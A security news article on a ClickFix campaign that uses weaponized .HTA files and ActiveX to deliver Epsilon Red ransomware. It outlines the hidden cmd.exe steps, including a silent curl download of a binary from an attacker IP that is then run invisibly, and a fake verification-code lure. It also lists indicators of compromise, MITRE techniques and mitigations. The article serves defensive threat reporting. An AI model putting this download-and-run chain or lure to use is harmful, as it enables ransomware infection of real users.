Hackers Use Weaponized .HTA Files to Infect Victims with Red Ransomware

CloudSEK’s TRIAD team uncovered an active development site deploying Clickfix-themed malware linked to the Epsilon Red ransomware.

This variant deviates from traditional clipboard-based command injection tactics by directing victims to a secondary page on the same domain, where malicious shell commands are executed silently through ActiveXObject(“WScript.Shell”) to facilitate payload delivery.

The script leverages Windows Command Shell (cmd.exe) for hidden execution, switching to the user’s home directory with “cd /D %userprofile%”, followed by a silent curl command to download a binary from an attacker-controlled IP (155.94.155.227:2269) and save it as a.exe, which is then run invisibly with the parameter ‘0’ to suppress any window.

This culminates in the deployment of Epsilon Red ransomware, identified by its MD5 hash 98107c01ecd8b7802582d404e007e493.

Advanced Clickfix Malware Campaign

To enhance deception, the script displays a fake verification message via “echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause”, complete with an intentional typo to mimic amateurish, non-threatening behavior, keeping the command prompt open for user interaction and reinforcing the social engineering lure.

Pivoting through associated infrastructure revealed a broader ecosystem of impersonations, including fake versions of the Discord Captcha Bot (captcha.bot), streaming platforms like Kick, Twitch, Rumble, and OnlyFans, as well as romance-themed dating lures, all designed to deliver Windows payloads via Clickfix mechanisms.

These sites exploit user trust in familiar services, urging clicks on verification buttons that trigger JavaScript-based command execution without overt interaction, aligning with MITRE ATT&CK techniques such as T1189 (Drive-by Compromise) for initial access, T1059.003 (Windows Command Shell) and T1059.005 (JavaScript/VBScript) for execution, and T1204.001 (Malicious Link) for user manipulation.

Defense evasion is achieved through T1027 (Obfuscated Files or Information) with silent downloads and T1036 (Masquerading) via benign-themed interfaces, while expected persistence involves T1053.005 (Scheduled Task/Job). Command and control occurs over T1071.001 (Web Protocols) using HTTP, leading to T1486 (Data Encrypted for Impact) in the ransomware phase.

Mitigation Strategies

Attributed to Epsilon Red, first observed in 2021, this ransomware draws loose inspiration from REvil in its ransom note styling, featuring minor grammatical refinements but lacking deeper tactical or infrastructural overlaps.

The campaign’s sophistication lies in abusing ActiveX for remote code execution directly from browser sessions, bypassing conventional download safeguards and enabling endpoint compromise that precedes lateral movement and full encryption.

According to a CloudSek report, brand impersonation significantly lowers user suspicion, increasing infection rates, while persistent reuse of themed delivery pages indicates a well-planned, long-term operation.

Additional indicators include domains like twtich.cc hosting .HTA files and capchabot.cc for regular Clickfix delivery, alongside a Quasar RAT variant (MD5: 2db32339fa151276d5a40781bc8d5eaa) tied to another C2 IP (213.209.150.188:8112).

To mitigate, organizations should disable ActiveX and Windows Script Host via Group Policies to block legacy execution vectors.

Integrating threat feeds for IP and domain blacklisting, including Indicators of Future Attack from Clickfix campaigns, is crucial.

Deploy endpoint detection and response rules to monitor hidden executions, silent curl downloads, and anomalous browser-spawned processes.

Finally, conduct security awareness training simulating impersonated services to build user resilience against these socially engineered threats.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!